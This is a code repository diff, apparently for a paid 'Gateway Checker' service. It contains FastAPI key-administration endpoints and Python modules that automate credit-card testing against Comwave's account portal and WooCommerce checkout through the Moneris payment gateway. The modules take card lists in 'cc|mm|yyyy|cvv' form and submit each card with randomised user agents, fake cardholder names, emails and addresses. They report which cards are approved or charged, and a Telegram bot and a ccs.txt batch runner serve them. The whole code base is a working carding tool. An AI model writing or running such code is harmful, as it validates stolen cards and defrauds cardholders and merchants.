@app.get("/admin/keys")
async def admin_list_keys(request: Request):
require_admin(request)
return await db.list_keys()
@app.get("/admin/keys/{key}")
async def admin_get_key(key: str, request: Request):
require_admin(request)
record = await db.get_key(key)
if not record:
raise HTTPException(404, {"detail": "Key not found"})
return record
@app.patch("/admin/keys/{key}")
async def admin_update_key(key: str, body: UpdateKeyRequest, request: Request):
require_admin(request)
record = await db.get_key(key)
if not record:
raise HTTPException(404, {"detail": "Key not found"})
updates = {}
changes = {}
if body.owner is not None:
updates["owner"] = body.owner
changes["owner"] = [record["owner"], body.owner]
if body.gateways is not None:
updates["allowed_gateways"] = body.gateways
changes["gateways"] = [record["allowed_gateways"], body.gateways]
if body.request_limit is not None:
updates["request_limit"] = body.request_limit
changes["request_limit"] = [record["request_limit"], body.request_limit]
if body.rate_per_minute is not None:
updates["rate_per_minute"] = body.rate_per_minute
changes["rate_per_minute"] = [record["rate_per_minute"], body.rate_per_minute]
if body.is_active is not None:
updates["is_active"] = body.is_active
changes["is_active"] = [record["is_active"], body.is_active]
if body.is_paused is not None:
updates["is_paused"] = body.is_paused
changes["is_paused"] = [record["is_paused"], body.is_paused]
if body.expires_days is not None:
from datetime import timedelta
new_exp = (datetime.now(timezone.utc) + timedelta(days=body.expires_days)).isoformat()
updates["expires_at"] = new_exp
changes["expires_at"] = [record["expires_at"], new_exp]
if not updates:
raise HTTPException(400, {"detail": "No fields to update"})
await db.update_key(key, **updates)
action = "pause_key" if body.is_paused is True else "unpause_key" if body.is_paused is False else "update_key"
await db.log_admin(action, key, changes, get_client_ip(request))
log.info(f"Key updated: {key[:15]}... — {list(changes.keys())}")
return {"detail": "Key updated", "changes": changes}
@app.delete("/admin/keys/{key}")
async def admin_delete_key(key: str, request: Request):
require_admin(request)
deleted = await db.delete_key(key)
if not deleted:
raise HTTPException(404, {"detail": "Key not found"})
await db.log_admin("revoke_key", key, None, get_client_ip(request))
log.info(f"Key revoked: {key[:15]}...")
return {"detail": "Key revoked"}
@app.get("/admin/stats")
async def admin_stats(request: Request):
require_admin(request)
stats = await db.get_stats_24h()
return {
"uptime": round(time.time() - START_TIME),
"active_tasks": sum(1 for t in tasks.values() if t["status"] in ("queued", "processing")),
"queue_depth": {name: q.qsize() for name, q in queues.items()},
"gateway_status": {name: gw["status"] for name, gw in GATEWAYS.items()},
**stats,
}
# ── Run ──
if __name__ == "__main__":
import uvicorn
host = os.getenv("API_HOST", "0.0.0.0")
port = int(os.getenv("API_PORT", "8000"))
uvicorn.run("api:app", host=host, port=port, log_level="info")

309
comwave_auth.py Normal file
View File

@@ -0,0 +1,309 @@
"""
Comwave $0 Auth Gateway — Account portal card update via Moneris Checkout v1.
Single shared session, serialized ticket step, parallel Moneris processing.
"""
import asyncio
import httpx
import random
import time
import os
import logging
from fake_useragent import UserAgent
logger = logging.getLogger("comwave_auth")
def get(s, start, end):
try:
start_index = s.index(start) + len(start)
end_index = s.index(end, start_index)
return s[start_index:end_index]
except ValueError:
return ""
MONERIS_URL = "https://gateway.moneris.com/chkt/display"
IDLE_TIMEOUT = 300
KEEPALIVE_INTERVAL = 120
RATE_LIMIT_SECONDS = 3
env_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".env")
CW_USER = ""
CW_PASS = ""
if os.path.exists(env_path):
for line in open(env_path):
line = line.strip()
if line.startswith("COMWAVE_USERNAME="):
CW_USER = line.split("=", 1)[1]
elif line.startswith("COMWAVE_PASSWORD="):
CW_PASS = line.split("=", 1)[1]
class ComwaveChecker:
"""
Shared single-session Comwave checker for multi-user Telegram bot.
- One login shared by all users. No repeated login/logout.
- _ticket_lock serializes the fast ticket step (~0.5s each).
- Moneris validate+process runs in parallel — no lock needed.
- Background tasks: idle auto-logout (5min) + keepalive ping (2min).
- Per-user rate limit prevents spam.
- Auto re-login on any session failure.
"""
def __init__(self):
self.session: httpx.AsyncClient | None = None
self.hdrs: dict = {}
self.logged_in: bool = False
self._ticket_lock = asyncio.Lock()
self._login_lock = asyncio.Lock()
self._last_activity: float = 0
self._user_cooldowns: dict[int | str, float] = {}
self._bg_task: asyncio.Task | None = None
self._pending: int = 0
def _start_bg(self):
if self._bg_task is None or self._bg_task.done():
self._bg_task = asyncio.create_task(self._bg_loop())
async def _bg_loop(self):
while True:
await asyncio.sleep(30)
if not self.logged_in:
break
idle = time.time() - self._last_activity
if idle >= IDLE_TIMEOUT and self._pending == 0:
logger.info("Idle timeout — logging out")
await self._do_logout()
break
if idle >= KEEPALIVE_INTERVAL:
try:
await self.session.get(
"https://myaccount.comwave.net/viewPayment",
headers={**self.hdrs, "Accept": "text/html"},
follow_redirects=True,
)
except Exception:
logger.warning("Keepalive ping failed — marking session dead")
self.logged_in = False
break
async def ensure_login(self) -> bool:
if self.logged_in and self.session:
return True
async with self._login_lock:
if self.logged_in and self.session:
return True
return await self._do_login()
async def _do_login(self) -> bool:
if self.session:
try:
await self.session.aclose()
except Exception:
pass
self.session = httpx.AsyncClient(timeout=40)
ua_str = UserAgent().random
self.hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"}
for attempt in range(2):
try:
r1 = await self.session.get(
"https://myaccount.comwave.net/welcome",
headers={**self.hdrs, "Accept": "text/html"},
follow_redirects=True,
)
ct = get(r1.text, 'name="currentTime" value="', '"')
fa = get(r1.text, 'action="', '"')
if not ct or not fa:
return False
r2 = await self.session.post(
f"https://myaccount.comwave.net{fa}",
data={"username": CW_USER, "password": CW_PASS, "currentTime": ct},
headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://myaccount.comwave.net/welcome"},
follow_redirects=True,
)
if "already logged in" in r2.text:
await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True)
await asyncio.sleep(2)
continue
if "Login" in (get(r2.text, "<title>", "</title>") or "Login"):
return False
self.logged_in = True
self._last_activity = time.time()
self._start_bg()
logger.info("Logged in to Comwave")
return True
except Exception as e:
logger.warning(f"Login attempt {attempt + 1} failed: {e}")
await asyncio.sleep(2)
return False
async def _do_logout(self):
if self.session:
try:
await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True)
except Exception:
pass
try:
await self.session.aclose()
except Exception:
pass
self.session = None
self.logged_in = False
logger.info("Logged out of Comwave")
async def _get_ticket(self) -> tuple[str, str]:
r = await self.session.post(
"https://myaccount.comwave.net/toUpdatePayment",
data={"formBean.updateCreditCardButton": "updateCC"},
headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://myaccount.comwave.net/viewPayment"},
follow_redirects=True,
)
ticket = get(r.text, "monerisCheckoutTicketID = '", "'")
redirect_url = str(r.url)
return ticket, redirect_url
async def _moneris_process(self, cc, mm, yyyy, cvv, ticket, redirect_url) -> str:
first_names = ["James", "John", "Robert", "Michael", "William", "David"]
last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"]
first_name = random.choice(first_names)
last_name = random.choice(last_names)
expiry = f"{mm}{yyyy[2:]}"
ua_str = self.hdrs["User-Agent"]
mon = httpx.AsyncClient(timeout=30, follow_redirects=True)
try:
await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}",
headers={"User-Agent": ua_str, "Accept": "text/html"})
mon_hdrs = {
"User-Agent": ua_str,
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{MONERIS_URL}/index.php?tck={ticket}",
}
form_data = {
"ticket": ticket, "action": "validate_transaction",
"pan": cc, "expiry_date": expiry, "cvv": cvv,
"cardholder": f"{first_name} {last_name}",
"card_data_key": "new", "currency_code": "CAD",
"wallet_details": "{}", "gift_details": "{}",
}
rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
if rv.json().get("response", {}).get("success") != "true":
return "Error: validate failed"
form_data["action"] = "process_transaction"
rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
resp = rp.json().get("response", {})
if resp.get("success") != "true":
return "Error: process failed"
result = resp.get("result", "")
card_type = ""
last4 = ""
approval_code = ""
ref_no = ""
payments = resp.get("payment", [])
if payments:
p = payments[0]
card_type = p.get("card", "")
last4 = p.get("pan", "")
approval_code = p.get("approval_code", "")
ref_no = p.get("reference_no", "")
info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}"
if result == "a":
if "monerischeckout" in redirect_url:
base = redirect_url.split("?")[0]
await self.session.post(base, data={"ticketID": ticket}, headers={
**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Accept": "application/json",
})
return f"APPROVED {info}"
else:
return f"DECLINED {info}"
finally:
await mon.aclose()
def check_rate_limit(self, user_id: int | str) -> float:
now = time.time()
last = self._user_cooldowns.get(user_id, 0)
remaining = RATE_LIMIT_SECONDS - (now - last)
return max(0, remaining)
def _touch_rate(self, user_id: int | str):
self._user_cooldowns[user_id] = time.time()
async def check_card(self, full: str, user_id: int | str = 0) -> str:
start = time.time()
wait = self.check_rate_limit(user_id)
if wait > 0:
return f"Rate limited — wait {round(wait, 1)}s"
self._touch_rate(user_id)
try:
cc, mm, yyyy, cvv = full.strip().split("|")
if len(yyyy) == 2:
yyyy = f"20{yyyy}"
except ValueError:
return "Error: bad format (cc|mm|yyyy|cvv)"
self._pending += 1
try:
if not await self.ensure_login():
self.logged_in = False
if not await self.ensure_login():
return "Error: login failed"
self._last_activity = time.time()
async with self._ticket_lock:
try:
ticket, redirect_url = await self._get_ticket()
except Exception:
ticket, redirect_url = "", ""
if not ticket:
self.logged_in = False
if not await self.ensure_login():
return "Error: re-login failed"
async with self._ticket_lock:
try:
ticket, redirect_url = await self._get_ticket()
except Exception:
ticket, redirect_url = "", ""
if not ticket:
return "Error: no ticket"
result = await self._moneris_process(cc, mm, yyyy, cvv, ticket, redirect_url)
elapsed = round(time.time() - start, 2)
return f"{result} - Taken {elapsed}s"
except Exception as e:
return f"Error: {e}"
finally:
self._pending -= 1
@property
def status(self) -> str:
if self.logged_in:
idle = round(time.time() - self._last_activity) if self._last_activity else 0
return f"🟢 Session active | {self._pending} pending | idle {idle}s"
return "🔴 Session inactive"
async def shutdown(self):
if self._bg_task and not self._bg_task.done():
self._bg_task.cancel()
await self._do_logout()
checker = ComwaveChecker()

185
comwave_charge.py Normal file
View File

@@ -0,0 +1,185 @@
"""
Comwave $3.33 Charge Gateway — WooCommerce guest checkout via Moneris Checkout v1.
Stateless — each call is a fresh session. No login required.
"""
import asyncio
import httpx
import random
import time
import logging
from fake_useragent import UserAgent
logger = logging.getLogger("comwave_charge")
def get(s, start, end):
try:
start_index = s.index(start) + len(start)
end_index = s.index(end, start_index)
return s[start_index:end_index]
except ValueError:
return ""
MONERIS_URL = "https://gateway.moneris.com/chkt/display"
SHOP_URL = "https://www.comwave.net/residential"
PRODUCT_ID = 7422
RATE_LIMIT_SECONDS = 3
_wc_rate: dict[int | str, float] = {}
async def check_card_3(full: str, user_id: int | str = 0) -> str:
"""
WooCommerce guest checkout — charges $3.33.
Returns a result string: "APPROVED ...", "DECLINED ...", or "Error: ...".
"""
start = time.time()
now = time.time()
last = _wc_rate.get(user_id, 0)
wait = RATE_LIMIT_SECONDS - (now - last)
if wait > 0:
return f"Rate limited — wait {round(wait, 1)}s"
_wc_rate[user_id] = now
try:
cc, mm, yyyy, cvv = full.strip().split("|")
if len(yyyy) == 2:
yyyy = f"20{yyyy}"
except ValueError:
return "Error: bad format (cc|mm|yyyy|cvv)"
first_names = ["James", "John", "Robert", "Michael", "William", "David", "Richard", "Joseph"]
last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia", "Miller", "Davis"]
first_name = random.choice(first_names)
last_name = random.choice(last_names)
email = f"cristini{random.randint(1000, 99999)}@gmail.com"
expiry = f"{mm}{yyyy[2:]}"
ua = UserAgent()
ua_str = ua.random
hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"}
async with httpx.AsyncClient(timeout=40, follow_redirects=True) as client:
try:
await client.get(SHOP_URL, headers={**hdrs, "Accept": "text/html"})
nonce_r = await client.get(
f"{SHOP_URL}/?wc-ajax=get_refreshed_fragments",
headers={**hdrs, "Accept": "application/json"},
)
woo_nonce = ""
parts = nonce_r.text.split("wc_cart_fragments_params")
if len(parts) > 1:
woo_nonce = get(parts[1], '"nonce":"', '"')
await client.post(
f"{SHOP_URL}/?wc-ajax=add_to_cart",
data={"product_id": PRODUCT_ID, "quantity": 1},
headers={**hdrs, "Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"},
)
co = await client.get(
f"{SHOP_URL}/checkout/",
headers={**hdrs, "Accept": "text/html"},
)
co_nonce = get(co.text, 'name="woocommerce-process-checkout-nonce" value="', '"')
if not co_nonce:
co_nonce = get(co.text, '#woocommerce-process-checkout-nonce"', '"')
checkout_data = {
"billing_first_name": first_name,
"billing_last_name": last_name,
"billing_address_1": f"{random.randint(100, 999)} Main St",
"billing_address_2": "",
"billing_city": "Toronto",
"billing_state": "ON",
"billing_postcode": "M5V 2T6",
"billing_country": "CA",
"billing_phone": f"416{random.randint(1000000, 9999999)}",
"billing_email": email,
"shipping_method[0]": "flat_rate:1",
"payment_method": "moneris_checkout",
"woocommerce-process-checkout-nonce": co_nonce,
"_wp_http_referer": "/residential/checkout/",
"terms": "on",
"terms-field": "1",
}
cr = await client.post(
f"{SHOP_URL}/?wc-ajax=checkout",
data=checkout_data,
headers={**hdrs, "Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"},
)
cr_json = cr.json()
ticket = cr_json.get("ticket", "")
if not ticket:
msgs = cr_json.get("messages", "")
if msgs:
err = get(str(msgs), "<li>", "</li>") or str(msgs)[:120]
return f"Error: {err}"
return f"Error: no ticket from WooCommerce"
mon = httpx.AsyncClient(timeout=30, follow_redirects=True)
try:
await mon.get(
f"{MONERIS_URL}/index.php?tck={ticket}",
headers={"User-Agent": ua_str, "Accept": "text/html"},
)
form_data = {
"ticket": ticket,
"action": "validate_transaction",
"pan": cc,
"expiry_date": expiry,
"cvv": cvv,
"cardholder": f"{first_name} {last_name}",
"card_data_key": "new",
"currency_code": "CAD",
"wallet_details": "{}",
"gift_details": "{}",
}
mon_hdrs = {
"User-Agent": ua_str,
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{MONERIS_URL}/index.php?tck={ticket}",
}
rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
if rv.json().get("response", {}).get("success") != "true":
return "Error: validate failed"
form_data["action"] = "process_transaction"
rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
resp = rp.json().get("response", {})
if resp.get("success") != "true":
return "Error: process failed"
result = resp.get("result", "")
card_type = ""
last4 = ""
approval_code = ""
ref_no = ""
payments = resp.get("payment", [])
if payments:
p = payments[0]
card_type = p.get("card", "")
last4 = p.get("pan", "")
approval_code = p.get("approval_code", "")
ref_no = p.get("reference_no", "")
info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}"
elapsed = round(time.time() - start, 2)
if result == "a":
return f"APPROVED {info} - Taken {elapsed}s"
else:
return f"DECLINED {info} - Taken {elapsed}s"
finally:
await mon.aclose()
except Exception as e:
return f"Error: {e}"

514
comwave_forbot.py Normal file
View File

@@ -0,0 +1,514 @@
import asyncio
import httpx
import random
import time
import os
import logging
from fake_useragent import UserAgent
logger = logging.getLogger("comwave")
def get(s, start, end):
try:
start_index = s.index(start) + len(start)
end_index = s.index(end, start_index)
return s[start_index:end_index]
except ValueError:
return ""
MONERIS_URL = "https://gateway.moneris.com/chkt/display"
IDLE_TIMEOUT = 300 # 5 min — auto-logout after no activity
KEEPALIVE_INTERVAL = 120 # 2 min — ping session to prevent server-side expiry
RATE_LIMIT_SECONDS = 3 # per-user cooldown between requests
env_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".env")
CW_USER = ""
CW_PASS = ""
if os.path.exists(env_path):
for line in open(env_path):
line = line.strip()
if line.startswith("COMWAVE_USERNAME="):
CW_USER = line.split("=", 1)[1]
elif line.startswith("COMWAVE_PASSWORD="):
CW_PASS = line.split("=", 1)[1]
class ComwaveChecker:
"""
Shared single-session Comwave checker for multi-user Telegram bot.
- One login shared by all users. No repeated login/logout.
- _ticket_lock serializes the fast ticket step (~0.5s each).
- Moneris validate+process runs in parallel — no lock needed.
- Background tasks: idle auto-logout (5min) + keepalive ping (2min).
- Per-user rate limit prevents spam.
- Auto re-login on any session failure.
"""
def __init__(self):
self.session: httpx.AsyncClient | None = None
self.hdrs: dict = {}
self.logged_in: bool = False
self._ticket_lock = asyncio.Lock()
self._login_lock = asyncio.Lock()
self._last_activity: float = 0
self._user_cooldowns: dict[int | str, float] = {}
self._bg_task: asyncio.Task | None = None
self._pending: int = 0 # how many requests are waiting/processing
# ── Background worker: keepalive + idle logout ────────────────────────────
def _start_bg(self):
if self._bg_task is None or self._bg_task.done():
self._bg_task = asyncio.create_task(self._bg_loop())
async def _bg_loop(self):
"""Runs while session is alive. Pings keepalive, handles idle logout."""
while True:
await asyncio.sleep(30) # check every 30s
if not self.logged_in:
break
idle = time.time() - self._last_activity
# Idle timeout — logout if no one has used it for 5 min
if idle >= IDLE_TIMEOUT and self._pending == 0:
logger.info("Idle timeout — logging out")
await self._do_logout()
break
# Keepalive — ping session if idle > 2 min but < 5 min
if idle >= KEEPALIVE_INTERVAL:
try:
await self.session.get(
"https://myaccount.comwave.net/viewPayment",
headers={**self.hdrs, "Accept": "text/html"},
follow_redirects=True,
)
except Exception:
logger.warning("Keepalive ping failed — marking session dead")
self.logged_in = False
break
# ── Login / logout ────────────────────────────────────────────────────────
async def ensure_login(self) -> bool:
if self.logged_in and self.session:
return True
async with self._login_lock:
if self.logged_in and self.session:
return True
return await self._do_login()
async def _do_login(self) -> bool:
if self.session:
try:
await self.session.aclose()
except Exception:
pass
self.session = httpx.AsyncClient(timeout=40)
ua_str = UserAgent().random
self.hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"}
for attempt in range(2):
try:
r1 = await self.session.get(
"https://myaccount.comwave.net/welcome",
headers={**self.hdrs, "Accept": "text/html"},
follow_redirects=True,
)
ct = get(r1.text, 'name="currentTime" value="', '"')
fa = get(r1.text, 'action="', '"')
if not ct or not fa:
return False
r2 = await self.session.post(
f"https://myaccount.comwave.net{fa}",
data={"username": CW_USER, "password": CW_PASS, "currentTime": ct},
headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://myaccount.comwave.net/welcome"},
follow_redirects=True,
)
if "already logged in" in r2.text:
await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True)
await asyncio.sleep(2)
continue # retry
if "Login" in (get(r2.text, "<title>", "</title>") or "Login"):
return False
self.logged_in = True
self._last_activity = time.time()
self._start_bg()
logger.info("Logged in to Comwave")
return True
except Exception as e:
logger.warning(f"Login attempt {attempt + 1} failed: {e}")
await asyncio.sleep(2)
return False
async def _do_logout(self):
if self.session:
try:
await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True)
except Exception:
pass
try:
await self.session.aclose()
except Exception:
pass
self.session = None
self.logged_in = False
logger.info("Logged out of Comwave")
# ── Ticket generation (sequential via lock) ───────────────────────────────
async def _get_ticket(self) -> tuple[str, str]:
r = await self.session.post(
"https://myaccount.comwave.net/toUpdatePayment",
data={"formBean.updateCreditCardButton": "updateCC"},
headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://myaccount.comwave.net/viewPayment"},
follow_redirects=True,
)
ticket = get(r.text, "monerisCheckoutTicketID = '", "'")
redirect_url = str(r.url)
return ticket, redirect_url
# ── Moneris validate + process (parallel-safe) ───────────────────────────
async def _moneris_process(self, cc, mm, yyyy, cvv, ticket, redirect_url) -> str:
first_names = ["James", "John", "Robert", "Michael", "William", "David"]
last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"]
first_name = random.choice(first_names)
last_name = random.choice(last_names)
expiry = f"{mm}{yyyy[2:]}"
ua_str = self.hdrs["User-Agent"]
mon = httpx.AsyncClient(timeout=30, follow_redirects=True)
try:
await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}",
headers={"User-Agent": ua_str, "Accept": "text/html"})
mon_hdrs = {
"User-Agent": ua_str,
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{MONERIS_URL}/index.php?tck={ticket}",
}
form_data = {
"ticket": ticket, "action": "validate_transaction",
"pan": cc, "expiry_date": expiry, "cvv": cvv,
"cardholder": f"{first_name} {last_name}",
"card_data_key": "new", "currency_code": "CAD",
"wallet_details": "{}", "gift_details": "{}",
}
rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
if rv.json().get("response", {}).get("success") != "true":
return "Error: validate failed"
form_data["action"] = "process_transaction"
rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
resp = rp.json().get("response", {})
if resp.get("success") != "true":
return "Error: process failed"
result = resp.get("result", "")
card_type = ""
amount = ""
last4 = ""
approval_code = ""
ref_no = ""
payments = resp.get("payment", [])
if payments:
p = payments[0]
card_type = p.get("card", "")
amount = p.get("amount", "")
last4 = p.get("pan", "")
approval_code = p.get("approval_code", "")
ref_no = p.get("reference_no", "")
info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}"
if result == "a":
if "monerischeckout" in redirect_url:
base = redirect_url.split("?")[0]
await self.session.post(base, data={"ticketID": ticket}, headers={
**self.hdrs, "Content-Type": "application/x-www-form-urlencoded",
"Accept": "application/json",
})
return f"APPROVED {info}"
else:
return f"DECLINED {info}"
finally:
await mon.aclose()
# ── Rate limiting ─────────────────────────────────────────────────────────
def check_rate_limit(self, user_id: int | str) -> float:
"""Returns 0 if allowed, or seconds remaining until next allowed request."""
now = time.time()
last = self._user_cooldowns.get(user_id, 0)
remaining = RATE_LIMIT_SECONDS - (now - last)
return max(0, remaining)
def _touch_rate(self, user_id: int | str):
self._user_cooldowns[user_id] = time.time()
# ── Main entry point ──────────────────────────────────────────────────────
async def check_card(self, full: str, user_id: int | str = 0) -> str:
"""
Check a single card. Safe to call concurrently from multiple bot handlers.
Returns result string like "APPROVED [VISA] - Taken 5.41s"
"""
start = time.time()
# Rate limit
wait = self.check_rate_limit(user_id)
if wait > 0:
return f"Rate limited — wait {round(wait, 1)}s"
self._touch_rate(user_id)
# Parse card
try:
cc, mm, yyyy, cvv = full.strip().split("|")
if len(yyyy) == 2:
yyyy = f"20{yyyy}"
except ValueError:
return "Error: bad format (cc|mm|yyyy|cvv)"
self._pending += 1
try:
# Ensure logged in
if not await self.ensure_login():
self.logged_in = False
if not await self.ensure_login():
return "Error: login failed"
self._last_activity = time.time()
# Get ticket (serialized)
async with self._ticket_lock:
try:
ticket, redirect_url = await self._get_ticket()
except Exception:
ticket, redirect_url = "", ""
# Retry once on failed ticket (session may be dead)
if not ticket:
self.logged_in = False
if not await self.ensure_login():
return "Error: re-login failed"
async with self._ticket_lock:
try:
ticket, redirect_url = await self._get_ticket()
except Exception:
ticket, redirect_url = "", ""
if not ticket:
return "Error: no ticket"
# Process via Moneris (parallel, no lock)
result = await self._moneris_process(cc, mm, yyyy, cvv, ticket, redirect_url)
elapsed = round(time.time() - start, 2)
return f"{result} - Taken {elapsed}s"
except Exception as e:
return f"Error: {e}"
finally:
self._pending -= 1
@property
def status(self) -> str:
if self.logged_in:
idle = round(time.time() - self._last_activity) if self._last_activity else 0
return f"🟢 Session active | {self._pending} pending | idle {idle}s"
return "🔴 Session inactive"
async def shutdown(self):
if self._bg_task and not self._bg_task.done():
self._bg_task.cancel()
await self._do_logout()
# ── WooCommerce $3 charge checker (stateless, no login needed) ────────────────
SHOP_URL = "https://www.comwave.net/residential"
PRODUCT_ID = "7422" # One Time Activation — $2.95 CAD
_wc_rate: dict[int | str, float] = {}
async def check_card_3(full: str, user_id: int | str = 0) -> str:
"""
WooCommerce guest checkout — charges $3.33 CAD ($2.95 + tax).
Stateless: each call gets its own session. Fully parallel-safe.
"""
start = time.time()
# Rate limit
now = time.time()
last = _wc_rate.get(user_id, 0)
if RATE_LIMIT_SECONDS - (now - last) > 0:
return f"Rate limited — wait {round(RATE_LIMIT_SECONDS - (now - last), 1)}s"
_wc_rate[user_id] = now
try:
cc, mm, yyyy, cvv = full.strip().split("|")
if len(yyyy) == 2:
yyyy = f"20{yyyy}"
except ValueError:
return "Error: bad format (cc|mm|yyyy|cvv)"
first_names = ["James", "John", "Robert", "Michael", "William", "David"]
last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"]
first_name = random.choice(first_names)
last_name = random.choice(last_names)
mail = f"cristini{random.randint(1000, 99999)}@gmail.com"
ua_str = UserAgent().random
base_headers = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"}
session = httpx.AsyncClient(timeout=40, follow_redirects=True)
try:
# Start WC session
await session.get(f"{SHOP_URL}/shop/", headers={**base_headers, "Accept": "text/html"})
# Add to cart
await session.post(
f"{SHOP_URL}/?wc-ajax=add_to_cart",
data={"product_id": PRODUCT_ID, "quantity": "1"},
headers={**base_headers, "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"},
)
# Get checkout nonce
r3 = await session.get(f"{SHOP_URL}/checkout/", headers={**base_headers, "Accept": "text/html"})
nonce = get(r3.text, '"update_order_review_nonce":"', '"')
if not nonce:
return "Error: no nonce"
# Update order review
await session.post(
f"{SHOP_URL}/?wc-ajax=update_order_review",
data={
"security": nonce,
"payment_method": "moneris_checkout_woocommerce",
"country": "CA", "state": "ON", "postcode": "M5H2N2",
"city": "Toronto", "address": "123 Main Street",
"has_full_address": "true",
},
headers={**base_headers, "X-Requested-With": "XMLHttpRequest"},
)
# Get Moneris ticket
r5 = await session.post(
f"{SHOP_URL}/moneris-checkout-wc?type=getticket",
data={
"billing_first_name": first_name, "billing_last_name": last_name,
"billing_country": "CA", "billing_address_1": "123 Main Street",
"billing_state": "ON", "billing_city": "Toronto",
"billing_postcode": "M5H2N2", "billing_phone": "4165551234",
"billing_email": mail,
"payment_method": "moneris_checkout_woocommerce",
},
headers={**base_headers, "X-Requested-With": "XMLHttpRequest"},
)
try:
ticket = r5.json()["data"]["ticket"]
except Exception:
return f"Error: no ticket"
# Moneris validate + process
expiry = f"{mm}{yyyy[2:]}"
mon = httpx.AsyncClient(timeout=30, follow_redirects=True)
try:
await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}",
headers={"User-Agent": ua_str, "Accept": "text/html"})
mon_hdrs = {
"User-Agent": ua_str,
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{MONERIS_URL}/index.php?tck={ticket}",
}
form_data = {
"ticket": ticket, "action": "validate_transaction",
"pan": cc, "expiry_date": expiry, "cvv": cvv,
"cardholder": f"{first_name} {last_name}",
"card_data_key": "new", "currency_code": "CAD",
"wallet_details": "{}", "gift_details": "{}",
}
rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
if rv.json().get("response", {}).get("success") != "true":
return "Error: validate failed"
form_data["action"] = "process_transaction"
rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs)
resp = rp.json().get("response", {})
if resp.get("success") != "true":
return "Error: process failed"
result = resp.get("result", "")
card_type = ""
amount = ""
last4 = ""
approval_code = ""
ref_no = ""
payments = resp.get("payment", [])
if payments:
p = payments[0]
card_type = p.get("card", "")
amount = p.get("amount", "")
last4 = p.get("pan", "")
approval_code = p.get("approval_code", "")
ref_no = p.get("reference_no", "")
info = f"[{card_type}] | Amount: {amount} | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}"
elapsed = round(time.time() - start, 2)
if result == "a":
return f"CHARGED {info} - Taken {elapsed}s"
else:
return f"DECLINED {info} - Taken {elapsed}s"
finally:
await mon.aclose()
except Exception as e:
return f"Error: {e}"
finally:
await session.aclose()
# ── Global instance — import this in your bot ─────────────────────────────────
checker = ComwaveChecker()
# ── Standalone test ───────────────────────────────────────────────────────────
async def main():
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
ccs_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "ccs.txt")
ccs = open(ccs_path, "r", encoding="utf-8").read().splitlines()
ccs = [c.strip() for c in ccs if c.strip()]
if not ccs:
print("No cards")
return
async def user_check(card, uid):
result = await checker.check_card(card, user_id=uid)
print(f"[User {uid}] {card} - {result}")
tasks = [user_check(card, i + 1) for i, card in enumerate(ccs)]
await asyncio.gather(*tasks)
await checker.shutdown()
print("\nDone")
if __name__ == "__main__":
asyncio.run(main())

179
db.py Normal file
View File

@@ -0,0 +1,179 @@
"""
SQLite database layer for Gateway Checker API.
Tables: api_keys, request_log, admin_log
"""
import aiosqlite
import secrets
import json
from datetime import datetime, timedelta, timezone
DB_PATH = "api.db"
def _now() -> str:
return datetime.now(timezone.utc).isoformat()
async def init_db():
async with aiosqlite.connect(DB_PATH) as db:
await db.execute("""
CREATE TABLE IF NOT EXISTS api_keys (
api_key TEXT PRIMARY KEY,
owner TEXT NOT NULL,
created_at TEXT NOT NULL,
expires_at TEXT,
request_limit INTEGER,
requests_used INTEGER NOT NULL DEFAULT 0,
rate_per_minute INTEGER NOT NULL DEFAULT 10,
allowed_gateways TEXT NOT NULL DEFAULT '["*"]',
is_active INTEGER NOT NULL DEFAULT 1,
is_paused INTEGER NOT NULL DEFAULT 0
)
""")
await db.execute("""
CREATE TABLE IF NOT EXISTS request_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
